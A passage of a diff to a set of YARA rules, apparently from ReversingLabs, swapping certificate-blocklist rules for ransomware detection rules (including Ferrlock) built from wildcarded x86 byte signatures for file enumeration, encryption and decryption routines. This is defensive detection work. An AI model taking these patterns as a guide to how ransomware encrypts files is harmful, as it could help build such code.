?? 8A 4D ?? FE C1 0F B6 C1 88 4D ?? 3B 45 + ?? 0F 82 C6 FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2 + } + $file_loop_2 = { + 55 8B EC 83 EC ?? 53 56 8B D9 57 89 5D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 32 C9 83 7D ?? ?? 88 4D ?? 0F 86 50 01 + 00 00 8B 5D ?? 0F 57 C0 66 0F 13 45 ?? 84 C9 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ?? + ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 49 ?? + 8B 75 ?? 8B 01 6A ?? 8B 00 6A ?? 52 56 6A ?? 89 55 ?? FF D0 84 C0 0F 84 F1 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 89 45 ?? + 33 D2 8B D8 85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73 + 10 8B 45 ?? 8D 0C 13 8B 40 ?? 42 88 4C 02 ?? EB CB 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 75 85 DB 77 11 72 08 81 FF ?? ?? + ?? ?? 73 07 8B F7 89 5D ?? EB 0C BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF + 30 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 75 ?? 75 ?? 8B 45 ?? 8B 55 ?? 8B 48 ?? 8B 45 ?? 2B FE 8B 31 83 DB ?? 2B D7 1B C3 50 + 8B 06 52 FF 75 ?? FF 75 ?? 6A ?? FF D0 84 C0 74 34 85 DB 77 A6 72 04 85 FF 75 8B 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 4D + ?? FE C1 0F B6 C1 88 4D ?? 3B 45 ?? 0F 82 BB FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2 + } + $file_loop_3 = { + 55 8B EC 83 EC ?? 53 56 8B C1 57 89 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 62 01 00 00 8B 5D ?? 32 C0 0F 57 C0 88 45 ?? 66 0F + 13 45 ?? EB 03 8D 49 ?? 84 C0 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ?? ?? ?? ?? 85 C0 + 0F 84 27 01 00 00 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 13 01 00 00 8B 4D ?? 8B 55 ?? 8B 49 ?? 8B 75 ?? 8B 01 + 6A ?? 8B 00 6A ?? 52 56 6A ?? 89 55 ?? FF D0 84 C0 0F 84 EE 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 89 45 ?? 33 D2 8B D8 90 + 85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73 10 8B 45 ?? + 8D 0C 13 8B 40 ?? 42 88 4C 02 ?? EB CB 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 75 85 DB 77 11 72 08 81 FF ?? ?? ?? ?? 73 07 + 8B F7 89 5D ?? EB 0C BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF 30 FF 15 ?? + ?? ?? ?? 85 C0 74 5E 39 75 ?? 75 59 8B 45 ?? 8B 55 ?? 8B 48 ?? 8B 45 ?? 2B FE 8B 31 83 DB ?? 2B D7 1B C3 50 8B 06 52 FF + 75 ?? FF 75 ?? 6A ?? FF D0 84 C0 74 30 85 DB 77 A6 72 04 85 FF 75 8B 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 45 ?? FE C0 88 + 45 ?? 3C ?? 0F 82 BE FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2 + } + $encrypt_data_1 = { + 55 8B EC 56 8B 75 ?? 57 8B F9 39 75 ?? 73 09 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 07 53 85 C0 74 58 48 83 F8 ?? 77 48 8B 5D ?? + 8B 45 ?? 3B D8 74 0B 56 50 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? 89 75 ?? 50 8B 45 ?? 53 6A ?? 0F B6 C0 50 6A ?? + FF 77 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5B 0F 44 CA 5F 8B C1 5E 5D C2 ?? ?? 5B 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B + 47 ?? 33 D2 89 45 ?? 8B 47 ?? 85 F6 74 26 8B 7D ?? 8B DE 8B 4D ?? 8B F0 2B F9 8A 04 0F 8D 49 ?? 32 04 32 88 41 ?? 8D 42 + ?? 33 D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5B 5F 8B C6 5E 5D C2 + } + $encrypt_data_2 = { + 55 8B EC 56 8B 75 ?? 57 8B F9 39 75 ?? 73 09 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 07 53 85 C0 74 56 48 83 F8 ?? 77 46 8B 5D ?? + 8B 45 ?? 3B D8 74 0B 56 50 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? 50 0F B6 45 ?? 53 6A ?? 50 6A ?? FF 77 ?? 89 75 + ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5B 0F 44 CA 5F 8B C1 5E 5D C2 ?? ?? 5B 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 47 ?? + 33 D2 89 45 ?? 8B 47 ?? 85 F6 74 26 8B 4D ?? 8B 7D ?? 8B DE 2B F9 8B F0 8A 04 0F 32 04 32 8D 49 ?? 88 41 ?? 8D 42 ?? 33 + D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5B 5F 8B C6 5E 5D C2 + } + $encrypt_data_3 = { + 55 8B EC 53 56 8B 75 ?? 8B D9 39 75 ?? 72 4C 83 3B ?? 77 47 8B 45 ?? 57 8B 7D ?? 3B F8 74 0B 56 50 57 E8 ?? ?? ?? ?? 83 + C4 ?? FF 75 ?? 8D 45 ?? 50 0F B6 45 ?? 57 6A ?? 50 6A ?? FF 73 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5F + 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 5E 83 C8 ?? 5B 5D C2 + } + $decrypt_data_1 = { + 55 8B EC 53 56 57 8B F9 8B 07 85 C0 74 53 48 83 F8 ?? 77 55 8B 75 ?? 39 75 ?? 72 4D 8B 5D ?? 8B 45 ?? 3B D8 74 0B 56 50 + 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 89 75 ?? 50 8B 45 ?? 53 6A ?? 0F B6 C0 50 6A ?? FF 77 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? + 83 CA ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 8B 75 ?? 39 75 ?? 73 0A 5F 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 47 ?? 33 D2 + 89 45 ?? 8B 47 ?? 85 F6 74 28 8B 7D ?? 8B DE 8B 4D ?? 8B F0 2B F9 8B FF 8A 04 0F 8D 49 ?? 32 04 32 88 41 ?? 8D 42 ?? 33 + D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5F 8B C6 5E 5B 5D C2 + } + $decrypt_data_2 = { + 55 8B EC 53 56 57 8B F9 8B 07 85 C0 74 51 48 83 F8 ?? 77 53 8B 75 ?? 39 75 ?? 72 4B 8B 5D ?? 8B 45 ?? 3B D8 74 0B 56 50 + 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 0F B6 45 ?? 53 6A ?? 50 6A ?? FF 77 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA + ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 8B 75 ?? 39 75 ?? 73 0A 5F 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 47 ?? 33 D2 89 45 + ?? 8B 47 ?? 85 F6 74 2A 8B 4D ?? 8B 7D ?? 8B DE 2B F9 8B F0 8D 64 24 ?? 8A 04 0F 32 04 32 8D 49 ?? 88 41 ?? 8D 42 ?? 33 + D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5F 8B C6 5E 5B 5D C2 + } + $decrypt_data_3 = { + 55 8B EC 53 8B D9 83 3B ?? 77 56 56 8B 75 ?? 39 75 ?? 73 09 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 45 ?? 57 8B 7D ?? 3B F8 74 0B + 56 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 0F B6 45 ?? 57 6A ?? 50 6A ?? FF 73 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? + 83 CA ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 83 C8 ?? 5B 5D C2 + } + $decrypt_strings_1 = { + 55 8B EC 53 56 8B D9 8B F2 57 33 C9 33 FF 2B DE 8B 45 ?? 8D 14 31 8A 04 07 02 C1 32 04 13 88 02 8D 47 ?? 33 D2 F7 75 ?? + 8B FA F6 C1 ?? 75 0B 8B C1 D1 E8 66 83 3C 46 ?? 74 03 41 EB D3 D1 E9 5F 5E 5B 8D 41 ?? 5D C3 + } + $decrypt_strings_2 = { + 55 8B EC 53 56 8B D9 57 8B F2 33 C9 33 FF 2B DE 8B 45 ?? 8D 14 31 8A 04 07 02 C1 32 04 13 88 02 8D 47 ?? 33 D2 F7 75 ?? + 8B FA F6 C1 ?? 75 0B 8B C1 D1 E8 66 83 3C 46 ?? 74 03 41 EB D3 5F D1 E9 5E 8D 41 ?? 5B 5D C3 + } + $decrypt_1 = { + A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C B7 00 00 00 33 D2 8B 0C 95 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0C + 95 ?? ?? ?? ?? 8B C1 D1 E9 83 E0 ?? 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 89 0C 95 ?? ?? ?? ?? 42 81 FA ?? ?? ?? ?? + 7C C0 81 FA ?? ?? ?? ?? 7D 39 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 81 E1 ?? ?? ?? ?? 33 0E 8B C1 D1 E9 83 E0 ?? 8B 04 + 85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 06 83 C6 ?? 81 FE ?? ?? ?? ?? 7C D0 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81 + E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 D1 E9 83 E0 ?? 33 0C 85 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B + 0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 + ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3 + } + $decrypt_2 = { + A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C C7 00 00 00 33 D2 EB 0C 8D A4 24 ?? ?? ?? ?? EB 03 8D 49 ?? 8B 0C 95 ?? ?? ?? ?? 33 + 0C 95 ?? ?? ?? ?? 42 81 E1 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? + ?? 89 0C 95 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 7C C0 81 FA ?? ?? ?? ?? 7D 3B 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 83 C6 ?? + 81 E1 ?? ?? ?? ?? 33 4E ?? 8B C1 83 E0 ?? D1 E9 8B 04 85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 46 ?? 81 FE ?? ?? ?? ?? + 7C CE 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? + ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ?? + ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3 + } + $decrypt_3 = { + A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C C7 00 00 00 33 D2 EB 0C 8D A4 24 ?? ?? ?? ?? EB 03 8D 49 ?? 8B 0C 95 ?? ?? ?? ?? 33 + 0C 95 ?? ?? ?? ?? 42 81 E1 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? + ?? 89 0C 95 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 7C C0 81 FA ?? ?? ?? ?? 7D 3B 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 83 C6 ?? + 81 E1 ?? ?? ?? ?? 33 4E ?? 8B C1 83 E0 ?? D1 E9 8B 04 85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 46 ?? 81 FE ?? ?? ?? ?? + 7C CE 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? + ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ?? + ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3 + } + $entrypoint_all = { + 83 EC ?? E8 ?? ?? ?? ?? 50 FF 15 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TOLGA KAPLAN" and pe.signatures[i].serial=="01:66:b6:50:38:d6:1e:54:35:b4:82:04:ca:e4:79:5a" and 1403999999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ((($file_loop_1 and $encrypt_data_1 and $decrypt_data_1 and $decrypt_strings_1 and $decrypt_1) or ($file_loop_2 and $encrypt_data_2 and $decrypt_data_2 and $decrypt_strings_2 and $decrypt_2) or ($file_loop_3 and $encrypt_data_3 and $decrypt_data_3 and $decrypt_3)) and ($entrypoint_all at pe.entry_point)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_784F226B45C3Bd8E4089243D747D1F59 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Ferrlock : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Ferrlock ransomware." author = "ReversingLabs" - id = "f2a979e0-2027-5143-8cb4-ffcfd19faf45" - date = "2023-11-08" - modified = "2023-11-08" + id = "745ce529-46d0-56ed-a8fa-b41b26b068f4" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2578-L2594" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "df8ca35a07ec6815d1efb68fa6fbf8f80c57032ecb99d0b038da0604ceffe8cf" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Ferrlock.yara#L1-L131" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b94bc77489dbb74573813631009e605bc848e17995a0a512d08b194ee3020b75" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Ferrlock" + tc_detection_factor = 5 importance = 25 + strings: + $search_files_p1 = { + 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41 + F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ?? + ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF + 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B + CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B + 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF + 57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 + C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 + ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA + ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB + } + $search_files_p2 = { + 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56 + 1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? + 83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? + ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15 + ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 + C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? + 80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 + 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 + } + $enum_rsrc = { + 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 8D 4D ?? 83 4D ?? ?? 51 50 6A + ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 + ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? EB ?? 33 DB 39 5D ?? 7E ?? + 8D 7E ?? F7 47 ?? ?? ?? ?? ?? 74 ?? 8D 47 ?? 89 45 ?? 8B 45 ?? 8B 00 8B 48 ?? 85 C9 + 74 ?? 8B 01 8D 55 ?? 52 FF 50 ?? EB ?? FF 37 8D 4D ?? E8 ?? ?? ?? ?? 83 65 ?? ?? 8D + 45 ?? 50 8B 45 ?? 8B 48 ?? E8 ?? ?? ?? ?? 83 4D ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 43 83 + C7 ?? 3B 5D ?? 7C ?? 83 4D ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 56 8D 45 ?? 50 FF + 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 + ?? ?? ?? ?? E8 ?? ?? ?? ?? C2 ?? ?? E8 ?? ?? ?? ?? CC 55 8B EC 6A ?? 68 ?? ?? ?? ?? + 64 A1 ?? ?? ?? ?? 50 56 A1 ?? ?? ?? ?? 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 83 + 65 ?? ?? 8B 4E ?? 85 C9 74 ?? 8B 11 3B CE 0F 95 C0 0F B6 C0 50 FF 52 ?? 83 66 ?? ?? + 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B E5 5D C3 + } + $create_test_file_p1 = { + 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 33 DB 8D 55 + ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 59 8D 45 ?? C6 45 ?? ?? + 50 8D 4D ?? 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 + ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 CB ?? 8B 3D ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 65 ?? ?? + 8D 4D ?? 83 65 ?? ?? 56 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? FF 75 ?? 8B 45 ?? 2B 45 + ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8B 55 ?? 8D 4D ?? 0F 43 45 ?? + 83 7D ?? ?? 0F 43 4D ?? 3B 55 ?? 75 ?? 52 50 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ?? + ?? ?? ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? + ?? 8D 4D ?? 0F 85 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 3B F7 0F 85 ?? ?? + ?? ?? 83 7D ?? ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 43 45 ?? 33 C9 51 57 + } + $create_test_file_p2 = { + 6A ?? 51 51 68 ?? ?? ?? ?? 50 FF D6 3B C3 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 + 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? + 33 C9 51 57 6A ?? 51 51 68 ?? ?? ?? ?? 50 FF D6 8B F8 3B FB 0F 84 ?? ?? ?? ?? 6A ?? + 57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 57 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? + ?? ?? E9 ?? ?? ?? ?? 6A ?? 58 3B F0 0F 42 F0 03 F0 56 E8 ?? ?? ?? ?? 59 6A ?? 89 85 + ?? ?? ?? ?? 8D 45 ?? 50 56 8B B5 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 75 + ?? 57 FF 15 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D 55 ?? 50 + 8B CE E8 ?? ?? ?? ?? 59 59 33 DB 53 53 53 57 FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75 + ?? 56 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F 43 + 4D ?? 83 7D ?? ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 8D 4D ?? + E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C3 E8 ?? + ?? ?? ?? C3 + } + $encrypt_files_p1 = { + 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 F6 8D 4D ?? 89 B5 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 75 ?? 8D 4D ?? 68 ?? ?? ?? ?? 89 75 ?? 89 75 ?? E8 ?? + ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 7D ?? 8B D8 8B 45 + ?? 0F 43 7D ?? 59 3B D8 77 ?? 85 DB 74 ?? 2B C3 40 03 C7 89 85 ?? ?? ?? ?? 2B C7 50 + 6A ?? 57 EB ?? 53 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 85 ?? ?? + ?? ?? 46 2B C6 50 6A ?? 56 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? EB ?? 2B F7 EB + ?? 83 CE ?? 83 FE ?? 74 ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 50 51 56 8D 4D + ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 + } + $encrypt_files_p2 = { + 50 E8 ?? ?? ?? ?? 6A ?? 5F 89 7D ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 51 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? + E8 ?? ?? ?? ?? C6 45 ?? ?? 8B C8 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85 + ?? ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 74 ?? 83 7D ?? ?? 8D + 55 ?? FF 75 ?? 0F 43 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 8B 40 ?? 03 C8 8B 51 + ?? 83 CA ?? 8B C2 0B C7 39 71 ?? 0F 44 D0 52 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 59 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FSPro Labs" and pe.signatures[i].serial=="78:4f:22:6b:45:c3:bd:8e:40:89:24:3d:74:7d:1f:59" and 1242777599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_rsrc) and ( all of ($search_files_p*)) and ( all of ($create_test_file_p*)) and ( all of 